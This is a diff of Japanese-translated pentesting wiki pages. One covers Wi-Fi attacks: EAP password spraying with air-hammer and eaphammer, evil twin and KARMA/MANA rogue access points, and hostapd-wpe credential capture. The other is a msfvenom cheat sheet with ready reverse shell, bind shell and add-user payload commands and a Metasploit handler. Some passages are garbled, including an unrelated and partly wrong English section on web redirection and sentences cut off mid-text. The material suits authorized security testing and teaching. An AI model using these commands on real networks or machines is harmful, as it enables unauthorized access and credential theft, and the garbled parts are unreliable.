この場合に使用される主な認証アルゴリズムは次のとおりです: - **EAP-GTC**:EAP-PEAPでハードウェアトークンとワンタイムパスワードの使用をサポートするためのEAPメソッドです。MSCHAPv2と似た実装ですが、ピアチャレンジは使用しません。代わりに、パスワードは**平文**でアクセスポイントに送信されます(ダウングレード攻撃に非常に興味深い)。 - **EAP-MD-5(メッセージダイジェスト)**:クライアントはパスワードのMD5ハッシュを送信します。**推奨されません**:辞書攻撃に対して脆弱であり、サーバーの認証も行われず、セッションごとの有線同等プライバシー(WEP)キーを生成する方法もありません。 - **EAP-TLS(トランスポート層セキュリティ)**:クライアント側とサーバー側の証明書を使用して認証を行い、後続の通信を保護するためにユーザーベースおよびセッションベースのWEPキーを動的に生成するために使用されます。 -- **EAP-TTLS(トンネル化トランスポート層セキュリティ)**:クライアントとネットワークの**相互認証**を暗号化されたチャネル(またはトンネル)を介して行うだけでなく、ユーザーごとのセッションごとのWEPキーを生成する手段も提供します。EAP-TLSとは異なり、**EAP-TTLSはサーバー側の証明書のみが必要です(クライアントは資格情報を使用します)**。 -- **PEAP(保護拡張認証プロトコル)**:PEAPは**EAP**プロトコルのようですが、通信を保護するために**TLSトンネル**を作成します。その後、弱い認証プロトコルをEAPの上に使用できます(トンネルによって保護されます)。 +- **EAP-TTLS(トンネル化トランスポート層セキュリティ)**:暗号化されたチャネル(またはトンネル)を介してクライアントとネットワークの**相互認証**を行うだけでなく、ユーザーごとのセッションごとのWEPキーを生成する手段も提供します。EAP-TLSとは異なり、EAP-TTLSではサーバー側の証明書のみが必要です(クライアントは資格情報を使用します)。 +- **PEAP(保護拡張認証プロトコル)**:PEAPはEAPプロトコルのようですが、通信を保護するために**TLSトンネル**を作成します。その後、弱い認証プロトコルをEAPの上に使用できます(トンネルによって保護されます)。 - **PEAP-MSCHAPv2**:これは広く採用されているため、**PEAP**とも呼ばれます。これはPEAPの上にある脆弱なチャレンジ/レスポンスであるMSCHAPv2です(TLSトンネルによって保護されます)。 - **PEAP-EAP-TLSまたはPEAP-TLS**:これは**EAP-TLS**に非常に似ていますが、証明書の交換の前にTLSトンネルが作成されます。 @@ -489,7 +508,7 @@ pyrit -r psk-01.cap analyze [https://tools.ietf.org/html/rfc3748#page-27](https://tools.ietf.org/html/rfc3748#page-27)を読むと、**EAP**を使用している場合、**「Identity」**メッセージが**サポート**される必要があり、**ユーザー名**は**「Response Identity」**メッセージで**クリア**に送信されます。 -最も安全な認証方法の1つである**PEAP-EAP-TLS**を使用していても、EAPプロトコルで送信される**ユーザー名をキャプチャ**することができます。これを行うには、認証通信をキャプチャします(チャンネル内で`airodump-ng`を開始し、同じインターフェースで`wireshark`を開始)し、パケットを`eapol`でフィルタリングします。**「Response, Identity」**パケットの中に、クライアントの**ユーザー名**が表示されます。 +最も安全な認証方法の1つである**PEAP-EAP-TLS**を使用していても、EAPプロトコルで送信される**ユーザー名をキャプチャ**することができます。これを行うには、認証通信をキャプチャします(チャネル内で`airodump-ng`を開始し、同じインターフェースで`wireshark`を開始)し、パケットを`eapol`でフィルタリングします。**「Response, Identity」**パケットの中に、クライアントの**ユーザー名**が表示されます。 ![](<../../.gitbook/assets/image (150).png>) @@ -497,7 +516,7 @@ pyrit -r psk-01.cap analyze (情報は[こちら](https://www.interlinknetworks.com/app_notes/eap-peap.htm)から取得) -**EAP-PEAP**および**EAP-TTLS**の両方は、**アイデンティティの非表示**をサポートしています。WiFi環境では、アクセスポイント(AP)は通常、関連付けプロセスの一環としてEAP-Identityリクエストを生成します。匿名性を保持するために、ユーザーのシステム上のEAPクライアントは、リクエストを処理するために十分な情報のみを含む応答を返します。以下の例に示すように。 +**EAP-PEAP**および**EAP-TTLS**の両方は、**アイデンティティの非公開**をサポートしています。WiFi環境では、アクセスポイント(AP)は通常、関連付けプロセスの一環としてEAP-Identityリクエストを生成します。匿名性を保持するために、ユーザーのシステム上のEAPクライアントは、リクエストを処理するために十分な情報のみを含む応答を返します。以下の例に示すように。 - _**EAP-Identity = anonymous**_ @@ -511,14 +530,14 @@ EAP-PEAPでは、PEAPサーバーとPEAPクライアントがTLSトンネルを EAP-TTLSは少し異なる動作をします。EAP-TTLSでは、クライアントは通常、TLSトンネルで保護されたPAPまたはCHAPを介して認証します。この場合、クライアントは、トンネルが確立された後に送信される最初のTLSメッセージにUser-Name属性とPasswordまたはCHAP-Password属性を含めます。 -どちらのプロトコルでも、TLSトンネルが確立されると、PEAP/TTLSサーバーはユーザーの真のアイデンティティを学習します。真のアイデンティティは、_**user@realm**_または単に_**user**_の形式である場合があります。PEAP/TTLSサーバーが_**user**_の認証も行っている場合、ユーザーのアイデンティティがわかり、TLSトンネルで保護されている認証方法を続行します。また、PEAP/TTLSサーバーは、ユーザーのホームRADIUSサーバーに新しいRADIUSリクエストを転送することもできます。この新しいRADIUSリクエストには、PEAPまたはTTLSプロトコルが削除されています。保護された認証方法がEAPである場 +どちらのプロトコルでも、TLSトンネルが確立されると、PEAP/TTLSサーバーはユーザーの真のアイデンティティを学習します。真のアイデンティティは、_**user@realm**_または単に_**user**_の形式である場合があります。PEAP/TTLSサーバーが_**user**_の認証も行っている場合、ユーザーのアイデンティティがわかり、TLSトンネルで保護されている認証方法を続行します。また、PEAP/TTLSサーバーは、ユーザーのホームRADIUSサーバーに新しいRADIUSリクエストを転送することもできます。この新しいRADIUSリクエストには、PEAPまたはTTLSプロトコルが削除されています。保護された認証方法がEAPである場合、内部のEAPメ ### EAP-Bruteforce(パスワードスプレー) -クライアントが**ユーザー名とパスワード**を使用することが予想される場合(**EAP-TLSはこの場合有効ではありません**)、次の手順で**ユーザー名**の**リスト**と**パスワード**を取得し、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)を使用してアクセスを**ブルートフォース**することができます。 +クライアントが**ユーザー名とパスワード**を使用することが予想される場合(**EAP-TLSは無効**になることに注意してください)、次の手順で**ユーザー名**の**リスト**と**パスワード**を取得し、[**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)を使用してアクセスを**ブルートフォース**することができます。 ```bash ./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt ``` -あなたは`eaphammer`を使用してもこの攻撃を実行することができます。 +あなたは`eaphammer`を使用して、この攻撃を実行することもできます。 ```bash ./eaphammer --eap-spray \ --interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \ @@ -530,7 +549,7 @@ EAP-TTLSは少し異なる動作をします。EAP-TTLSでは、クライアン ### ネットワークの選択とローミング -802.11プロトコルは、ステーションがESSに参加する方法を指定する非常に具体的なルールを持っていますが、ステーションがどのESSに接続するかを選択する方法は指定していません。さらに、プロトコルは、同じESSを共有するアクセスポイント間でステーションが自由にローミングできるようにします(建物の一方から他方に移動する際にWiFi接続が失われることは望ましくありません)。ただし、802.11プロトコルはこれらのアクセスポイントがどのように選択されるべきかを指定していません。さらに、ステーションはアクセスポイントに関連付けるためにESSに認証されなければならないが、802.11プロトコルはアクセスポイントがステーションに認証されることを要求していません。 +802.11プロトコルは、ステーションがESSに参加する方法を指定する非常に具体的なルールを持っていますが、ステーションがどのESSに接続するかを選択する方法は指定していません。さらに、プロトコルは、同じESSを共有するアクセスポイント間でステーションが自由にローミングできるようにします(建物の一方から他方に移動する際にWiFi接続が失われることは望ましくありません)。ただし、802.11プロトコルはこれらのアクセスポイントがどのように選択されるべきかを指定していません。さらに、ステーションはアクセスポイントに関連付けるためにESSに認証されなければなりませんが、802.11プロトコルはアクセスポイントがステーションに認証されることを要求していません。 ### 優先ネットワークリスト(PNL) @@ -538,7 +557,7 @@ EAP-TTLSは少し異なる動作をします。EAP-TTLSでは、クライアン ### パッシブスキャン -インフラストラクチャネットワークでは、アクセスポイントは定期的にビーコンフレームを送信して周辺のステーションに存在と機能を広告します。ビーコンはブロードキャストフレームであり、つまり、範囲内のすべての近くのステーションに受信されることを意味します。ビーコンには、APのサポートされるレート、暗号化の機能、追加情報などが含まれており、最も重要なのは、ビーコンフレームにAPのESSIDが含まれていることです(ESSIDのブロードキャストが無効にされていない限り)。 +インフラストラクチャネットワークでは、アクセスポイントは定期的にビーコンフレームを送信して周辺のステーションに存在と機能を広告します。ビーコンはブロードキャストフレームであり、つまり、範囲内のすべての近くのステーションに受信されることを意味します。ビーコンにはAPのサポートされるレート、暗号化の機能、追加情報などが含まれますが、最も重要なのは、ビーコンフレームにAPのESSIDが含まれていることです(ESSIDのブロードキャストが無効にされていない限り)。 パッシブスキャン中、クライアントデバイスは近くのアクセスポイントからのビーコンフレームを受信します。クライアントデバイスがPNLのESSIDフィールドと一致するESSIDを持つビーコンフレームを受信した場合、クライアントは自動的にビーコンフレームを送信したアクセスポイントに接続します。次に、現在ワイヤレスに接続されていないワイヤレスデバイスをターゲットにしたい場合、そのクライアントのPNLに少なくとも1つのエントリを知っている場合、そのエントリのESSIDを使用して独自のアクセスポイントを作成するだけで、クライアントを接続させることができます。 @@ -546,7 +565,7 @@ EAP-TTLSは少し異なる動作をします。EAP-TTLSでは、クライアン 802.11で使用される2番目のネットワーク選択アルゴリズムはアクティブプロービングと呼ばれます。アクティブプロービングを使用するクライアントデバイスは、範囲内のAPが何であるか、およびその機能が何であるかを判断するために、継続的にプローブリクエストフレームを送信します。プローブリクエストには、直接指定されたものとブロードキャストされたものの2つの形式があります。直接指定されたプローブリクエストは特定のESSIDに宛てられ、特定のネットワークが近くにあるかどうかをクライアントが確認する方法です。 -直接指定されたプローブリクエストを使用するクライアントは、PNLの各ネットワークに対してプローブリクエストを送信します。なお、直接指定されたプロービングは近くの非表示ネットワークの存在を特定する唯一の方法であることに注意してください。ブロードキャストプローブリクエストはほぼ同じ方法で機能しますが、SSIDフィールドがNULLに設定されています。これにより、ブロードキャストプローブが近くのすべてのアクセスポイントに送信され、ステーションはPNLのいずれかの優先ネットワークが近くにあるかどうかを確認できますが、PNLの内容は明らかにされません。 +直接指定されたプローブリクエストを使用するクライアントは、PNLの各ネットワークに対してプローブリクエストを送信します。なお、直接指定されたプロービングは近くに隠れたネットワークの存在を特定する唯一の方法であることに注意してください。ブロードキャストプローブリクエストはほぼ同じ方法で機能しますが、SSIDフィールドがNULLに設定されています。これにより、ブロードキャストプローブが近くのすべてのアクセスポイントに送信され、ステーションはPNLの内容を明らかにせずに、好みのネットワークが近くにあるかどうかを確認できます。 ## インターネットへのリダイレクトを備えたシンプルなAP @@ -566,7 +585,7 @@ apt-get install dnsmasq #Manages DHCP and DNS # Specify interface to listen on interface=wlan0 -# Specify the DHCP range +# Specify the IP address range for DHCP dhcp-range=192.168.0.100,192.168.0.200,12h # Specify the DNS server @@ -576,7 +595,26 @@ server=8.8.8.8 この設定ファイルでは、dnsmasqを使用して以下の設定を行います: - リスンするインターフェースを指定します。 -- DHCPの範囲を指定します。 +- DHCPのIPアドレス範囲を指定します。 +- DNSサーバーを指定します。 + +```plaintext +# dnsmasqの設定ファイルです。 + +# リスンするインターフェースを指定します +interface=wlan0 + +# DHCPのIPアドレス範囲を指定します +dhcp-range=192.168.0.100,192.168.0.200,12h + +# DNSサーバーを指定します +server=8.8.8.8 +``` + +この設定ファイルでは、dnsmasqを使用して以下の設定を行います: + +- リスンするインターフェースを指定します。 +- DHCPのIPアドレス範囲を指定します。 - DNSサーバーを指定します。 ``` interface=wlan0 @@ -612,7 +650,7 @@ hostapdは、ワイヤレスネットワークのセキュリティをテスト ``` apt-get install hostapd ``` -以下は、_hostapd.conf_という名前の設定ファイルです: +以下は、_hostapd.conf_という名前の設定ファイルです。 ```plaintext interface=wlan0 @@ -630,7 +668,7 @@ wpa_pairwise=TKIP rsn_pairwise=CCMP ``` -この設定ファイルを使用して、ホストアクセスポイントを構成することができます。 +この設定ファイルを使用して、ワイヤレスアクセスポイントを設定することができます。 ``` interface=wlan0 driver=nl80211 @@ -657,27 +695,27 @@ hostapd ./hostapd.conf ``` ### フォワーディングとリダイレクション -Forwarding and redirection are techniques used in web applications to redirect users from one URL to another. These techniques can be used for various purposes, such as improving user experience, handling URL changes, or implementing security measures. +Forwarding and redirection are techniques used in web applications to redirect users from one URL to another. These techniques are commonly used for various purposes, such as URL shortening, load balancing, and handling page not found errors. #### Forwarding -Forwarding is the process of redirecting a user's request from one URL to another URL on the server side. This can be done using server-side scripting languages like PHP, Python, or JavaScript. +Forwarding is the process of redirecting a user's request from one URL to another URL. This can be done using server-side techniques or client-side techniques. -There are two types of forwarding: +Server-side forwarding is typically done using HTTP status codes, such as 301 (Moved Permanently) or 302 (Found). When a server receives a request for a specific URL, it responds with a status code and the new URL to which the request should be redirected. The client's browser then automatically sends a new request to the new URL. -1. **Client-side forwarding**: In this type of forwarding, the server sends a response to the client with a new URL, and the client's browser automatically redirects to the new URL. This is achieved using the `Location` header in the HTTP response. - -2. **Server-side forwarding**: In this type of forwarding, the server receives a request from the client and internally forwards it to another URL. The client is unaware of this internal forwarding and continues to interact with the original URL. - -Forwarding can be used for various purposes, such as redirecting users to a different page after a successful login, redirecting users to a mobile version of a website, or redirecting users to a different domain. +Client-side forwarding, on the other hand, is done using JavaScript or meta tags. When a user visits a web page, the JavaScript code or meta tag instructs the browser to automatically redirect the user to a different URL. #### Redirection -Redirection is the process of automatically redirecting a user's request from one URL to another URL. This can be achieved using HTTP status codes, such as 301 (Moved Permanently) or 302 (Found), along with the `Location` header in the HTTP response. +Redirection is similar to forwarding, but it involves sending the user to a different URL without the user's knowledge. This technique is often used for malicious purposes, such as phishing attacks or URL hijacking. -Redirection can be used for various purposes, such as handling URL changes, redirecting users from an old website to a new website, or implementing security measures to prevent unauthorized access. +There are several methods for performing redirection, including: -It is important to note that both forwarding and redirection can be misused by attackers to perform phishing attacks or to redirect users to malicious websites. Therefore, it is crucial to implement proper security measures, such as input validation and secure coding practices, to prevent such attacks. +- **HTTP Redirection**: This involves using HTTP status codes, such as 301 or 302, to redirect the user's request to a different URL. +- **JavaScript Redirection**: This involves using JavaScript code to automatically redirect the user to a different URL. +- **Meta Tag Redirection**: This involves using HTML meta tags to instruct the browser to automatically redirect the user to a different URL. + +It is important to note that while forwarding and redirection can be useful for legitimate purposes, they can also be abused for malicious activities. Web application developers and security professionals should be aware of these techniques and implement appropriate security measures to prevent misuse. ```bash iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface wlan0 -j ACCEPT @@ -685,13 +723,13 @@ echo 1 > /proc/sys/net/ipv4/ip_forward ``` ## イービルツイン -イービルツイン攻撃は、ほとんどのコンピュータやスマートフォンがワイヤレスネットワークの「名前」またはESSID(拡張サービスセット識別子)しか見ることができないという事実を利用したWi-Fi攻撃の一種です(基地局はクライアントに対して認証を行う必要がないため)。これにより、同じ名前と同じ種類の暗号化を使用するネットワークを区別するのは非常に困難になります。実際には、多くのネットワークでは、ユーザーを混乱させずにアクセスを拡張するために、同じ名前を使用する複数のネットワーク拡張アクセスポイントが存在します。 +イービルツイン攻撃は、ほとんどのコンピュータやスマートフォンがワイヤレスネットワークの「名前」またはESSIDしか見ることができないという事実を利用したWi-Fi攻撃の一種です(基地局はクライアントに対して認証を行う必要がないため)。これにより、同じ名前と同じ種類の暗号化を使用するネットワークを区別するのは非常に困難になります。実際には、多くのネットワークは、ユーザーを混乱させることなくアクセスを拡張するために、同じ名前を使用する複数のネットワーク拡張アクセスポイントを持っています。 -クライアントの実装方法によって(802.11プロトコルでは、同じESS内のアクセスポイント間を自由にローミングすることが許可されていることを覚えておいてください)、デバイスを接続している基地局を変更することが可能です。これは、より良い信号を提供すること(常に可能ではありません)または元の基地局へのアクセスをブロックすること(認証解除パケット、ジャミング、またはその他のDoS攻撃など)によって行うことができます。 +クライアントの実装方法によって(802.11プロトコルでは、同じESS内のアクセスポイント間を自由にローミングすることが許可されていることを覚えておいてください)、デバイスを接続している基地局を変更することが可能です。これは、より良い信号を提供すること(常に可能ではありません)または元の基地局へのアクセスをブロックすること(認証解除パケット、ジャミング、またはその他のDoS攻撃)によって行うことができます。 -また、実際のワイヤレス展開では通常、単一のアクセスポイントよりも複数のアクセスポイントがあり、これらのアクセスポイントは天井に向けて配置されるため、より強力で視野範囲が広い場合があります。単一のアクセスポイントを認証解除すると、ターゲットは通常、ローグAPではなく別の有効なアクセスポイントにローミングする結果となります(近くのすべてのアクセスポイントが認証解除される(大音量)場合や、ローグAPの配置に非常に注意する(困難)場合を除く)。 +また、実際のワイヤレス展開では通常、単一のアクセスポイントよりも複数のアクセスポイントがあり、これらのアクセスポイントは天井に向けて配置されているため、より強力で視野範囲が広い場合があります。単一のアクセスポイントの認証解除は、ターゲットがローグAPではなく別の有効なアクセスポイントにローミングする結果となる場合が多いです(近くのすべてのアクセスポイントが認証解除される(大音量)か、ローグAPの配置に非常に注意する必要がある(困難)場合を除く)。 -次の手順で、非常に基本的なオープンイービルツイン(インターネットへのトラフィックのルーティング機能なし)を作成できます。 +以下の手順で、非常に基本的なオープンイービルツイン(インターネットへのトラフィックのルーティング機能なし)を作成することができます。 ```bash airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon ``` @@ -703,28 +741,28 @@ airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 1 wlan0mon ![](<../../.gitbook/assets/image (148).png>) -デフォルトでは、PNLのESSIDがWPAで保護されている場合、デバイスは自動的にオープンなEvil Twinに接続しません。実際のAPをDoS攻撃し、ユーザーが手動でオープンなEvil Twinに接続することを期待するか、実際のAPをDoS攻撃し、WPA Evil Twinを使用してハンドシェイクをキャプチャすることができます(この方法では、PSKを知らないため、被害者を接続させることはできませんが、ハンドシェイクをキャプチャして解読を試みることができます)。 +デフォルトでは、PNLに保存されているESSIDがWPAで保護されている場合、デバイスは自動的にオープンなEvil Twinに接続しません。実際のAPをDoS攻撃し、ユーザーが手動でオープンなEvil Twinに接続することを期待するか、実際のAPをDoS攻撃し、WPA Evil Twinを使用してハンドシェイクをキャプチャすることができます(この方法では、PSKを知らないため、被害者を自分に接続させることはできませんが、ハンドシェイクをキャプチャして解読を試みることができます)。 _一部のOSとAVは、オープンなネットワークに接続することは危険であるとユーザーに警告する場合があります..._ ### WPA/WPA2 Evil Twin -**WPA/2を使用したEvil Twin**を作成することができます。デバイスがWPA/2でそのSSIDに接続するように設定されている場合、接続を試みるでしょう。ただし、**4ウェイハンドシェイクを完了するには**、クライアントが使用する**パスワードを知る必要があります**。それを**知らない**場合、**接続は完了しません**。 +**WPA/2を使用したEvil Twin**を作成することができます。デバイスがWPA/2でそのSSIDに接続するように設定されている場合、接続を試みます。ただし、**4ウェイハンドシェイクを完了するには**、クライアントが使用する**パスワードを知る必要があります**。それを**知らない**場合、**接続は完了しません**。 ``` ./eaphammer -i wlan0 -e exampleCorp -c 11 --creds --auth wpa-psk --wpa-passphrase "mywifipassword" ``` -### エンタープライズの偽のツイン +### エンタープライズの偽アクセスポイント この攻撃を理解するためには、まず[WPAエンタープライズの説明](./#wpa-enterprise-mgt)を読むことをおすすめします。 -**hostapd-wpeの使用** +**hostapd-wpeを使用する** `hostapd-wpe`は動作するために**設定**ファイルが必要です。これらの設定を自動化するために、[https://github.com/WJDigby/apd\_launchpad](https://github.com/WJDigby/apd\_launchpad)を使用することができます(_/etc/hostapd-wpe/_内のPythonファイルをダウンロードしてください)。 ``` ./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com hostapd-wpe ./victim/victim.conf -s ``` -設定ファイルでは、ssid、チャネル、ユーザーファイル、証明書/キー、DHパラメータ、WPAバージョン、認証など、さまざまな項目を選択できます... +設定ファイルでは、ssid、チャネル、ユーザーファイル、証明書/キー、dhパラメータ、wpaバージョン、認証など、さまざまな項目を選択できます... [**EAP-TLSを使用したhostapd-wpeを使用して、任意の証明書でログインを許可する方法**](evil-twin-eap-tls.md) @@ -780,7 +818,7 @@ _hostapd-wpe_の**設定**内で、_**dh\_file**_を含む行を**コメント ### ESSIDおよびMACのブラック/ホワイトリスト -次の表は、使用されるときの効果を含むさまざまなタイプのMFACL(Management Frame Access Control Lists)とその効果をリストしています: +次の表は、使用されるときの効果を含む、異なるタイプのMFACL(Management Frame Access Control Lists)とその効果をリストしています: ![](<../../.gitbook/assets/image (149).png>) ``` @@ -810,7 +848,7 @@ KARMA攻撃は、ステーションが使用するネットワーク選択プロ ### MANA -Ian de VilliersとDominic Whiteによると、現代のステーションは、少なくとも1つのブロードキャストプローブリクエストに既に応答していないアクセスポイントからの指向性プローブレスポンスを無視することで、KARMA攻撃から自己保護するように設計されています。これにより、KARMA攻撃の脆弱性があるステーションの数は大幅に減少しました。しかし、2015年にWhiteとde Villiersは、そのような保護を回避する手段を開発しました。Whiteとde Villiersの改良されたKARMA攻撃(MANA攻撃)では、指向性プローブレスポンスを使用して近くのステーションのPNL(Preferred Network List)を再構築します。ステーションからブロードキャストプローブリクエストが受信されると、攻撃者のアクセスポイントは、そのデバイスのPNLに既に存在する指向性プローブからの任意のSSIDで応答します。 +Ian de VilliersとDominic Whiteによると、現代のステーションは、少なくとも1つのブロードキャストプローブリクエストに既に応答していないアクセスポイントからの指向性プローブレスポンスを無視することで、KARMA攻撃から自己保護するように設計されています。これにより、KARMA攻撃の脆弱性があるステーションの数は大幅に減少しました。しかし、2015年にWhiteとde Villiersは、そのような保護を回避する手段を開発しました。Whiteとde Villiersの改良されたKARMA攻撃(MANA攻撃)では、指向性プローブレスポンスを使用して近くのステーションのPNL(Preferred Network List)を再構築します。ステーションからブロードキャストプローブリクエストが受信されると、攻撃者のアクセスポイントは、そのデバイスのPNLに既に存在する任意のSSIDで応答します。 要約すると、MANAアルゴリズムは次のように機能します。アクセスポイントがプローブリクエストを受信するたびに、まずブロードキャストまたは指向性プローブかどうかを判断します。指向性プローブの場合、送信元のMACアドレスがハッシュテーブルに追加されます(まだ存在しない場合)し、ESSIDがそのデバイスのPNLに追加されます。その後、アクセスポイントは指向性プローブレスポンスを返します。ブロードキャストプローブの場合、アクセスポイントはそのデバイスのPNL内の各ネットワークに対してプローブレスポンスを返します。 @@ -853,11 +891,11 @@ Wi-Fi Directは、ワイヤレスAPなしでデバイス同士を接続するた Wi-Fi Directは、デバイスを安全に接続するためにWi-Fi Protected Setup(WPS)に依存しています。WPSには、**Push-Button** Configuration(PBC)、**PIN entry**、**Near-Field** Communication(NFC)など、複数の設定方法があります。 -したがって、WPS PINに対する以前の攻撃は、ここでも有効です(PINが使用されている場合)。 +したがって、WPS PINに対する以前に見られた攻撃は、ここでもPINが使用されている場合に有効です。 ### EvilDirectハイジャッキング -これはEvil-Twinのように機能しますが、Wi-Fi Direct用です。グループオーナーをなりすまして、他のデバイス(例:電話)が自分に接続するように仕向けることができます:`airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0` +これはEvil-Twinのように機能しますが、Wi-Fi Direct用です。グループオーナーをなりすまして、他のデバイス(例:電話)があなたに接続するように試みることができます:`airbase-ng -c 6 -e DIRECT-5x-BRAVIA -a BB:BB:BB:BB:BB:BB mon0` ## 参考文献 @@ -872,12 +910,12 @@ Wi-Fi Directは、デバイスを安全に接続するためにWi-Fi Protected S TODO: [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher)を確認する(FacebookでのログインとキャプティブポータルでのWPAの模倣) -
+
-**HackenProofはすべての暗号バグバウンティの場所です。** +**HackenProofはすべての暗号バグ報奨金の場です。** **遅延なしで報酬を受け取る**\ -HackenProofのバウンティは、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。 +HackenProofの報奨金は、顧客が報酬予算を入金した後に開始されます。バグが検証された後に報酬を受け取ることができます。 **Web3ペントestingの経験を積む**\ ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!成長するWeb3セキュリティをマスターしましょう。 @@ -885,7 +923,7 @@ HackenProofのバウンティは、顧客が報酬予算を入金した後に開 **Web3ハッカーレジェンドになる**\ 各検証済みのバグで評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。 -[**HackenProofでサインアップ**](https://hackenproof.com/register)してハッキングから報酬を得ましょう! +[**HackenProofにサインアップ**](https://hackenproof.com/register)してハッキングから報酬を得ましょう! {% embed url="https://hackenproof.com/register" %} diff --git a/generic-methodologies-and-resources/shells/msfvenom.md b/generic-methodologies-and-resources/shells/msfvenom.md index 889b80c0a..dda910c01 100644 --- a/generic-methodologies-and-resources/shells/msfvenom.md +++ b/generic-methodologies-and-resources/shells/msfvenom.md @@ -12,7 +12,7 @@ -
+
**HackenProofはすべての暗号バグバウンティの場所です。** @@ -20,7 +20,7 @@ HackenProofのバウンティは、顧客が報酬予算を入金した後にのみ開始されます。バグが検証された後に報酬を受け取ることができます。 **Web3ペンテストの経験を積む**\ -ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!上昇期のWeb3セキュリティをマスターしましょう。 +ブロックチェーンプロトコルとスマートコントラクトは新しいインターネットです!上昇期のweb3セキュリティをマスターしましょう。 **Web3ハッカーレジェンドになる**\ 各検証済みのバグごとに評判ポイントを獲得し、週間リーダーボードのトップを制覇しましょう。 @@ -29,7 +29,7 @@ HackenProofのバウンティは、顧客が報酬予算を入金した後にの {% embed url="https://hackenproof.com/register" %} ---- +*** `msfvenom -p -e -f -i LHOST=` @@ -72,11 +72,11 @@ PrependSetuid=True #Use this to create a shellcode that will execute something w ``` ### **リバースシェル** -リバースシェルは、ターゲットのWindowsマシンに接続するための便利な方法です。以下の手順に従って、リバースシェルを作成しましょう。 +リバースシェルは、ターゲットのWindowsマシンに接続するための一般的な方法です。以下の手順に従って、リバースシェルを作成しましょう。 1. Metasploitフレームワークを使用して、リバースシェルペイロードを生成します。次のコマンドを実行します。 -``` +```plaintext msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell.exe ``` @@ -86,7 +86,7 @@ msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= 4. Metasploitフレームワークを使用して、リバースシェルに接続します。次のコマンドを実行します。 -``` +```plaintext msfconsole use exploit/multi/handler set payload windows/shell_reverse_tcp @@ -97,63 +97,61 @@ exploit 5. 上記のコマンドを実行すると、攻撃者のマシンがリバースシェルに接続し、ターゲットマシンを制御できるようになります。 -以上で、Windowsマシンへのリバースシェルの作成が完了しました。 +これで、Windowsマシンに対してリバースシェルを作成する方法がわかりました。この手法を使用して、ターゲットマシンをハッキングすることができます。ただし、合法的な目的のためにのみ使用してください。 ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe ``` -A bind shell is a type of shell that listens for incoming connections on a specific port. Once a connection is established, the bind shell provides a command prompt interface to interact with the target system. This allows an attacker to gain remote access and control over the compromised system. +### バインドシェル -To create a bind shell payload using msfvenom, you can use the following command: +バインドシェルは、攻撃者がターゲットマシンに接続し、リモートでコマンドを実行するための方法です。バインドシェルを使用すると、攻撃者はターゲットマシンの制御を取得し、様々な操作を行うことができます。 -``` -msfvenom -p LHOST= LPORT= -f -o +バインドシェルを作成するために、私たちは`msfvenom`ツールを使用します。`msfvenom`は、Metasploitフレームワークの一部であり、様々なペイロードを生成するために使用されます。 + +以下のコマンドを使用して、バインドシェルのペイロードを生成します。 + +```plaintext +msfvenom -p LHOST= LPORT= -f -o ``` -- ``: The payload to use, such as `windows/meterpreter/reverse_tcp` or `linux/x86/shell/bind_tcp`. -- ``: The IP address of the attacker machine. -- ``: The port number to listen on. -- ``: The output format, such as `exe`, `elf`, or `raw`. -- ``: The file to save the generated payload. +- ``: 使用するペイロードの種類を指定します。 +- ``: 攻撃者のIPアドレスを指定します。 +- ``: 攻撃者が接続するポート番号を指定します。 +- ``: ペイロードの出力形式を指定します。 +- ``: 生成されたペイロードを保存するファイルのパスを指定します。 -For example, to create a bind shell payload for a Windows system, listening on port 4444, and save it as an executable file named `shell.exe`, you can use the following command: +例えば、以下のコマンドを使用して、Linuxシステム向けのバインドシェルを生成します。 -``` -msfvenom -p windows/meterpreter/bind_tcp LHOST= LPORT=4444 -f exe -o shell.exe +```plaintext +msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.0.100 LPORT=4444 -f elf -o shell.elf ``` -Remember to replace `` with your actual IP address. +このコマンドは、`linux/x86/shell_bind_tcp`ペイロードを使用し、攻撃者のIPアドレスが`192.168.0.100`であり、ポート番号が`4444`であるバインドシェルを生成します。出力形式は`elf`であり、生成されたペイロードは`shell.elf`という名前のファイルに保存されます。 -Once the payload is generated, you can transfer it to the target system and execute it. Once the bind shell is established, you can use a compatible listener, such as Metasploit's `multi/handler`, to connect to the target system and gain remote access. +バインドシェルを作成した後は、攻撃者は生成されたペイロードをターゲットマシンにデプロイし、接続を確立することができます。これにより、攻撃者はターゲットマシン上でコマンドを実行し、システムにアクセスすることができます。 ```bash msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe ``` ### ユーザーの作成 -To create a user, you can use the `msfvenom` tool provided by Metasploit. `msfvenom` allows you to generate various types of payloads, including shellcode, which can be used to create a user on a target system. +To create a user, you can use the `msfvenom` tool provided by Metasploit. This tool allows you to generate various types of payloads, including shellcode that can be used to create a user on a target system. -ユーザーを作成するには、Metasploitが提供する`msfvenom`ツールを使用することができます。`msfvenom`を使用すると、シェルコードを含むさまざまなタイプのペイロードを生成することができます。これを使用して、ターゲットシステム上にユーザーを作成することができます。 +To create a user, you need to specify the payload type, the desired username, and the password for the new user. Here is an example command: -The following command can be used to generate a payload that creates a user with the username "hacker" and password "password123": - -以下のコマンドを使用して、ユーザー名が「hacker」でパスワードが「password123」のユーザーを作成するペイロードを生成することができます。 - -```plaintext -msfvenom -p windows/adduser USER=hacker PASS=password123 -f exe > adduser.exe +``` +msfvenom -p windows/adduser USER=username PASS=password -f exe > adduser.exe ``` 